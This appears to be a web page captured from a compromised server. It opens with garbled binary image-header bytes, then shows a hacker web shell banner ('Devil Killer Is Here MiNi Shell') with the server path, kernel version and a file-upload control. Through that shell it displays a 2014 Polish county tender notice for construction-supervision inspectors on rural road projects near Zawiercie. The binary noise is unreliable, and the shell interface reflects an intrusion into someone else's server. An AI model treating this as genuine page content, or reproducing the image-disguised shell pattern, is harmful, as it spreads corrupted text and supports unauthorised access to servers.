JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141215/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141215/410294-N-2014.html

<p class="kh_header"><b>Zawiercie: Sprawowanie funkcji inspektora nadzoru budowlanego - 3 zadania</b><br>
<b>Numer ogłoszenia: 410294 - 2014; data zamieszczenia: 15.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starosta Zawierciański , ul. Sienkiewicza 34, 42-400 Zawiercie, woj. śląskie, tel. 32 67 107 10 do 12 wew. 551, faks 32 67 219 71.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zawiercie.powiat.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprawowanie funkcji inspektora nadzoru budowlanego - 3 zadania.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie zostało podzielone na  3 zadania:

1)	Zadanie nr 1: 
Sprawowanie funkcji inspektora nadzoru budowlanego dla zadania: Budowa lub przebudowa (remont drogi istniejącej), wydzielonych w ramach postepowania scaleniowego, dróg dojazdowych do gruntów rolnych i leśnych oraz dojazdów do zabudowań gospodarczych poszczególnych uczestników postepowania scaleniowego dla wsi Wiesiółka o długości ok. 0,9 km- w formule zaprojektuj i wybuduj realizowanego w ramach operacji pn. Scalanie gruntów rolnych na obiekcie obejmującym trzy wsie Wiesiółka, Chruszczobród Piaski oraz cz. Chruszczobrodu w gminie Łazy Powiat Zawierciański dot. działania -Poprawianie i rozwijanie infrastruktury związanej z rozwojem i dostosowaniem rolnictwa i leśnictwa przez scalenie gruntów objętego PROW na lata 2007-2013
2)	Zadanie nr 2: 
Sprawowanie funkcji inspektora nadzoru budowlanego dla zadania: Budowa lub przebudowa (remont drogi istniejącej), wydzielonych w ramach postepowania scaleniowego, dróg dojazdowych do gruntów rolnych i leśnych oraz dojazdów do zabudowań gospodarczych poszczególnych uczestników postepowania scaleniowego dla wsi Chruszczobród Piaski o długości ok. 9,8 km- w formule zaprojektuj i wybuduj realizowanego w ramach operacji pn. Scalanie gruntów rolnych na obiekcie obejmującym trzy wsie Wiesiółka, Chruszczobród Piaski oraz cz. Chruszczobrodu w gminie Łazy Powiat Zawierciański dot. działania Poprawianie i rozwijanie infrastruktury związanej z rozwojem i dostosowaniem rolnictwa i leśnictwa przez scalenie gruntów objętego PROW na lata 2007-2013.
3)	Zadanie nr 3:
Sprawowanie funkcji inspektora nadzoru budowlanego dla zadania: Budowa lub przebudowa (remont drogi istniejącej), wydzielonych w ramach postepowania scaleniowego, dróg dojazdowych do gruntów rolnych i leśnych oraz dojazdów do zabudowań gospodarczych poszczególnych uczestników postepowania scaleniowego dla części wsi Chruszczobród o długości ok. 11,22 km w formule zaprojektuj i wybuduj realizowanego w ramach operacji pn. Scalanie gruntów rolnych na obiekcie obejmującym trzy wsie Wiesiółka, Chruszczobród Piaski oraz cz. Chruszczobrodu w gminie Łazy Powiat Zawierciański dot. działania Poprawianie i rozwijanie infrastruktury związanej z rozwojem i dostosowaniem rolnictwa i leśnictwa przez scalenie gruntów objętego PROW na lata 2007-2013.

Do obowiązków Inspektora będzie należało w szczególności:
1)	udział w pracach komisji przetargowej przy wyborze Realizującego w charakterze członka komisji przetargowej
2)	reprezentowanie Zamawiającego w pracach związanych z opracowaniem dokumentacji projektowej, tj. sprawdzania kompletności i zgodności projektu z umową, wnioskowanie do Zamawiającego w sprawach dotyczących wprowadzenia niezbędnych zmian w dokumentacji technicznej i uzyskania zgody projektanta na zmiany,
3)	reprezentowanie Zamawiającego na budowie przez sprawowanie kontroli i sprawdzanie zgodności realizacji robót z dokumentacją projektową, umową zawartą z Realizującym roboty budowlane, pozwoleniem na budowę, przepisami i obowiązującymi normami oraz zasadami wiedzy technicznej, 
4)	organizowanie prac związanych z nadzorem w sposób niepowodujący zbędnych przerw w realizacji robót przez Realizującego, 
5)	systematyczne dokonywanie wpisów do dziennika budowy 
6)	wykonanie w trakcie trwania każdego etapu robót budowlanych co najmniej 3 kontroli i odnotowanie ich w dzienniku budowy ,
7)	sporządzanie miesięcznych sprawozdań z przebiegu prac i przekazywanie ich Zamawiającemu w terminie 2 dni od daty sporządzenia,
8)	sprawdzanie jakości wykonywanych robót i używanych materiałów, zlecanie Realizującemu przeprowadzenia  dodatkowych badań materiałów budzących  wątpliwości co do ich jakości, zapobieganie zastosowaniu wyrobów budowlanych wadliwych i niedopuszczonych do stosowania w budownictwie, a także sprawdzanie czy użyte materiały posiadają niezbędne atesty, świadectwa i certyfikaty, gromadzenie dowodów dopuszczenia do stosowania w budownictwie wyrobów budowlanych oraz urządzeń technicznych,
9)	podejmowanie decyzji o dopuszczeniu do użycia materiałów i sprzętu, 
10)	sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających,
11)	ustalenie we współpracy z Realizującym harmonogramu rzeczowo-finansowego robót,
12)	sprawdzanie wykonanych robót i powiadamianie Realizującego o wykrytych wadach, egzekwowanie usunięcia wad przez Realizującego oraz  poświadczanie usunięcia wad, a także ustalanie rodzaju i zakresu prac koniecznych do usunięcia wad 
13)	wydawanie kierownikowi budowy lub kierownikowi robót poleceń dotyczących: wykonywania prac, dokonywania poprawek, ponownego wykonywania wadliwie wykonanych robót, usunięcia nieprawidłowości lub zagrożeń, wykonania prób lub badań, a także przedstawienia ekspertyz dotyczących prowadzonych robót budowlanych
14)	uzyskiwanie od projektanta wyjaśnień wątpliwości dotyczących projektu i zawartych w nim rozwiązań,
15)	udzielanie Realizującemu informacji, wyjaśnień i wskazówek dotyczących wykonania robót budowlanych,
16)	udział w spotkaniach i naradach organizowanych przez Zamawiającego,
17)	stwierdzenie zakończenia robót, sprawdzenie kompletności i prawidłowości dokumentacji powykonawczej i przedłożenie jej do akceptacji Zamawiającego w celu ustalenia terminu ostatecznego odbioru robót, zgłoszenie gotowości do odbioru oraz uczestniczenie w odbiorze,
18)	złożenie Zamawiającemu przed końcowym odbiorem robót drogowych pisemnego raportu  z realizacji przedmiotu umowy,  
19)	kontrolowanie stosowania przez wykonawcę przepisów dotyczących ochrony środowiska naturalnego, zasad BHP oraz wydawanie poleceń w tym zakresie,
20)	wstrzymanie robót w przypadku prowadzenia ich niezgodnie z umową, projektem lub innymi właściwymi w tym zakresie przepisami (BHP, ppoż. itp.) 
21)	ustalanie metod obmiaru robót oraz uczestniczenia przy dokonywaniu obmiarów robót przez Realizującego ,
22)	kontrolowanie wytwórni materiałów, prefabrykatów mas bitumicznych w celu sprawdzenia zgodności z normami stosowanych metod wytwarzania,
23)	kontrolowanie sposobu składowania i przechowywania materiałów oraz uporządkowania miejsc  składowania po zakończeniu robót, 
24)	sprawdzenie i potwierdzenie zakresu rzeczowego i finansowego wykonanych prac przed ich odbiorem,
25)	zatwierdzenie przejściowych rozliczeń i przekazywanie ich Zamawiającemu wraz z wszystkimi załącznikami, 
26)	zatwierdzenie wartości robót do wypłaty dla Realizującego 
27)	zatwierdzenie końcowego rozliczenia i przekazanie go Zamawiającemu wraz z wszystkim załącznikami,
28)	sprawdzanie wszystkich dokumentów związanych z końcowym rozliczeniem oraz zgłoszenie Zamawiającemu gotowości do przejęcia całości robót,
29)	decydowanie o konieczności przedłużenia terminów wykonania poszczególnych etapów prac budowlanych po stosownych konsultacjach z Zamawiającym 
30)	bieżące informowanie Zamawiającego o wszelkich problemach związanych z realizacją inwestycji,
31)	udział w przeglądach dróg w okresie gwarancji udzielonej Zamawiającemu przez Realizującego roboty budowlane i wydawanie opinii w sprawie usterek; kontrola usunięcia przez Realizującego roboty budowlane  stwierdzonych wad oraz udział w odbiorach wykonanych prac związanych z usunięciem wad  w czasie okresu gwarancji,
32)	po zakończeniu okresu gwarancji oraz usunięciu usterek, Wykonawca dokona odbioru pogwarancyjnego i sporządzi protokół odbioru pogwarancyjnego z kopią dla Zamawiającego podając datę, w której Realizujący zakończył swoje obowiązki wynikające z okresu gwarancji,
33)	inne zadania wynikające z przepisów prawa,  w tym zadania wykonywane przez inspektora nadzoru przewidziane ustawą Prawo Budowlane.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1, 71.52.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.05.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający uzna, że warunek jest spełniony, jeżeli wykonawca złoży wraz z ofertą podpisany Załącznik Nr 2 do SIWZ, tj.: oświadczenie o spełnianiu warunków udziału w postępowaniu. Ocena spełniania warunków zostanie dokonana wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonanych (a w przypadku świadczeń okresowych lub ciągłych wykonywanych) głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia  działalności jest krótszy, w tym okresie  z podaniem ich wartości, przedmiotu dat wykonania i odbiorców oraz załączeniem stosownych dowodów potwierdzających, że usługi te zostały wykonane należycie lub że są one wykonywane należycie (sporządzony wg wzoru stanowiącego załącznik nr 5 do SIWZ), w szczególności:
a)	  poświadczenia, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż 3 miesiące przez upływem terminu składania ofert.
b)	  oświadczenie wykonawcy, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej.
Warunek ten zostanie uznany za spełniony, jeżeli Wykonawca wykaże wykonanie:
1)	dla zadania nr 1 - co najmniej jednej usługi polegającej na pełnieniu nadzoru inwestorskiego nad zadaniem w zakresie budowy, przebudowy lub remontu dróg o wartości minimum 41 000,00 zł brutto, (wg wzoru stanowiącego załącznik Nr 5 do SIWZ) wraz z dokumentem potwierdzającym, że usługa została wykonana należycie
2)	dla zadania nr 2 - co najmniej jednej usługi polegającej na pełnieniu nadzoru inwestorskiego nad zadaniem w zakresie budowy, przebudowy lub remontu dróg o wartości minimum 447 000,00 zł brutto, (wg wzoru stanowiącego załącznik Nr 5 do SIWZ) wraz z dokumentem potwierdzającym, że usługa została wykonana należycie
3)	dla zadania nr 3 - co najmniej jednej usługi polegającej na pełnieniu nadzoru inwestorskiego nad zadaniem w zakresie budowy, przebudowy lub remontu dróg o wartości minimum 512 000,00 zł brutto, (wg wzoru stanowiącego załącznik Nr 5 do SIWZ) wraz z dokumentem potwierdzającym, że usługa została wykonana należycie. Ocena spełniania warunków zostanie dokonana wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający uzna, że warunek jest spełniony, jeżeli wykonawca złoży wraz z ofertą podpisany Załącznik Nr 2 do SIWZ, tj.: oświadczenie o spełnianiu warunków udziału w postępowaniu. Ocena spełniania warunków zostanie dokonana wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności oraz informacją o podstawie do dysponowania tymi osobami  (sporządzony według wzoru stanowiącego Załącznik Nr 4 do SIWZ), z uwzględnieniem spełnienia wymogów pkt. VI.1.3) SIWZ, tj.warunek ten zostanie uznany za spełniony, jeżeli Wykonawca dysponuje lub będzie dysponował minimum jedną (1) do każdego zadania osobą, która będzie uczestniczyć w wykonywaniu zamówienia, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane w zakresie zamówienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów. Ocena spełniania warunków zostanie dokonana wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający uzna, że warunek jest spełniony, jeżeli wykonawca złoży wraz z ofertą podpisany Załącznik Nr 2 do SIWZ, tj.: oświadczenie o spełnianiu warunków udziału w postępowaniu. Ocena spełniania warunków zostanie dokonana wg formuły spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta powinna zawierać również:

1)	wypełniony formularz oferty (wg wzoru stanowiącego Załącznik Nr 1 do SIWZ )
2)	pełnomocnictwo do podpisania oferty, o ile prawo do podpisania oferty nie wynika z innych dokumentów złożonych wraz z ofertą - treść pełnomocnictwa musi jednoznacznie wskazywać czynności, do wykonywania których pełnomocnik jest powołany
3)	pełnomocnictwo do reprezentowania wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia do reprezentowania wykonawców w postępowaniu lub do reprezentowania w postępowaniu i podpisania umowy
4)	Pisemne zobowiązanie innych podmiotów zgodnie z art. 26 ust. 2b (jeżeli dotyczy)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający dopuszcza wprowadzenie zmian do umowy w poniższych okolicznościach,:
1)	W przypadku zmiany stawki podatku VAT dopuszcza się zmianę ceny                               o zmianę stawki podatku VAT przy zachowaniu ceny jednostkowej netto,
2)	Zmiana warunków płatności spowodowana koniecznością ich dostosowania do  zasad przyznania i wydatkowania środków finansowych przekazanych przez instytucję przyznającą pomoc finansową - zgodnie z umową zawartą z tą instytucją,
3)	Zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy,
4)	Zmiana terminu realizacji w przypadku i wyłącznie za zgodą Instytucji pośredniczącej :
a)	Gdy roboty budowlane zostaną wstrzymane przez właściwe organy, z przyczyn niezależnych od Realizującego, co uniemożliwia terminowe wykonanie przedmiotu umowy - termin wykonania przedmiotu umowy będzie przesunięty o czas nie wykonywania robót i/lub o czas niezbędny do wykonania prac wynikających z zaleceń właściwych organów 
b)	Zmiany Realizującego roboty budowlane
c)	zaistnienia konieczności dostosowania terminu realizacji zamówienia objętego niniejszym postępowaniem do terminu realizacji umów na roboty budowlane wchodzące w zakres projektu, a zmiana terminu, o ile będzie uzasadniona, obejmować będzie okres niezbędny do zakończenia wykonywania przedmiotu umowy,
d)	konieczności wykonania przez Realizującego robót dodatkowych, o których mowa w art. 67 ust. 1 pkt. 5  ustawy Prawo zamówień publicznych lub robót zamiennych
e)	zawieszenia przez Zamawiającego wykonywanych przez Realizującego robót,
f)	działania   siły wyższej,
g)	w przypadku zmiany w dokumentacji projektowej o czas niezbędny dla  dostosowania się Wykonawcy do takiej zmiany,
5)	Zmiana osób pełniących obowiązki inspektora nadzoru na inną osobę legitymującą się co najmniej uprawnieniami wymaganymi do wykazania spełniania warunków udziału   w postępowaniu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zawiercie.powiat.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Zawierciu
ul. Sienkiewicza 34
42-400 Zawiercie, pokój 309.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.12.2014 godzina 11:00, miejsce: Starostwo Powiatowe w Zawierciu
ul. Sienkiewicza 34
42-400 Zawiercie, pokój 309.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie realizowane w ramach operacji pn. Scalanie gruntów rolnych na obiekcie obejmującym trzy wsie Wiesiółka, Chruszczobród Piaski oraz cz. Chruszczobrodu w gminie Łazy Powiat Zawierciański dot. działania Poprawianie i rozwijanie infrastruktury związanej z rozwojem i dostosowaniem rolnictwa i leśnictwa przez scalenie gruntów objętego PROW na lata 2007-2013..</p>
